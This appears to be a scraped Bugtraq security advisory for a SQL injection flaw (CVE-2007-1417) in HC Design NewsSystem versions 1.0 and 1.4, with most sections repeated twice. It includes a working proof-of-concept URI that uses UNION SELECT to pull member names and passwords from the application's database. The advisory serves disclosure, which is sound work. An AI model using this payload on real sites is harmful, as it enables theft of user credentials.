HC Design NewsSystem Index.PHP SQL Injection Vulnerability
BID:22898
Info
HC Design NewsSystem Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 22898 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-1417 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 09 2007 12:00AM |
| Updated: | May 12 2015 07:29PM |
| Credit: | UniquE-Cracker is credited with the discovery of this vulnerability. |
| Vulnerable: |
HC DESIGN NEWSYSTEM 1.4 HC DESIGN NEWSYSTEM 1.0 |
| Not Vulnerable: | |
Discussion
HC Design NewsSystem Index.PHP SQL Injection Vulnerability
NEWSYSTEM is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue affects versions 1.0 and 1.4; other versions may also be affected.
NEWSYSTEM is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue affects versions 1.0 and 1.4; other versions may also be affected.
Exploit / POC
HC Design NewsSystem Index.PHP SQL Injection Vulnerability
Attackers can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/path/index.php?option=news&aktion=komm&ID=-1/**/UNION/**/SELECT/**/null,null,mname,null,mpassword,null,null/**/FROM/**/hcmitglieder/**/WHERE/**/id=1/
Attackers can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/path/index.php?option=news&aktion=komm&ID=-1/**/UNION/**/SELECT/**/null,null,mname,null,mpassword,null,null/**/FROM/**/hcmitglieder/**/WHERE/**/id=1/
Solution / Fix
HC Design NewsSystem Index.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
HC Design NewsSystem Index.PHP SQL Injection Vulnerability
References:
References: